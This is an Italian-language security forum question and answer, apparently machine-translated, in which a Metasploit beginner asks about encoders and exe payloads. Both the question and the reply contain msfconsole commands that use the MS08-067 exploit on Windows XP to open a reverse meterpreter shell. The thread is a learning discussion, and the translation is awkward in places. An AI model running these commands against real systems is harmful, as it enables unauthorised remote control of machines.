Quando inviare file exe al sistema di destinazione per sfruttare tramite metasploit

1

Sono novizio in Metasploit. Sto ancora imparando le basi, ma sono confuso e vorrei un aiuto.

1) - In precedenza ho imparato come sfruttare semplicemente qualsiasi O.S. vulnerabilità usando meterpreter. Possiamo inviare un exploit al sistema di destinazione e creare un binding / reverse shell per il controllo. Esempio -

Hack windows xp con MS08-067 exploit

msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) >

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4 (Target) RHOST => 192.168.1.4

msf exploit(ms08_067_netapi) > exploit %codice% meterpreter > sysinfo

Ora con i comandi sopra possiamo usare una shell di destinazione dalla macchina dell'attaccante. Non è necessario creare alcun exe per connettersi al sistema vulnerabile di destinazione. Meterpreter inietta automaticamente la memoria e possiamo ottenere shell.

2) -

Ora, quando usiamo un codificatore, dobbiamo creare un exe e legare il nostro carico all'interno dell'exe. Quando la vittima esegue questo exe possiamo ottenere la shell di sistema della vittima.

meterpreter > shell

Per sfruttare il sistema della vittima dobbiamo trasferire questo exe al loro sistema.

Domanda:

In precedenza non abbiamo bisogno di alcun exe per sfruttare un sistema, ma con l'uso di un codificatore abbiamo bisogno di un exe per nascondere il payload. Possiamo semplicemente codificare il nostro payload meterpreter tcp_bind senza exe e inviarlo al sistema delle vittime?

Qualsiasi aiuto davvero apprezzabile.

    
posta Prashant K Shukla 10.08.2017 - 07:05
fonte

1 risposta

1

Informazioni BackGround (Poiché metasploit è la mia marmellata): I sistemi più aggiornati non sono realmente suscettibili agli attacchi remoti (come tu intendi). Ad esempio, il payload di accesso remoto specificato viene utilizzato su Windows XP. La ragione per cui msfvenom e altre cose sono usate, in congiunzione con l'exe è perché può essere usata per tentare di eludere l'Anti-virus e altre cose lungo le linee. (Tuttavia la codifica viene utilizzata per eliminare i caratteri non validi e non rendere l'antivirus invisibile.)

Risposta: Sì, sei in grado di sfruttare direttamente il sistema, ma non è necessario specificare il carico utile. Dopo lo sfruttamento con successo con ms08 verrà aperta una sessione meterpreter.

Esempio di exploit: msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set rhost <IP>; exploit"

Ecco un link utile per questo payload specifico .

(se questo è ciò che intendevi in precedenza)

    
risposta data 10.08.2017 - 17:33
fonte

Leggi altre domande sui tag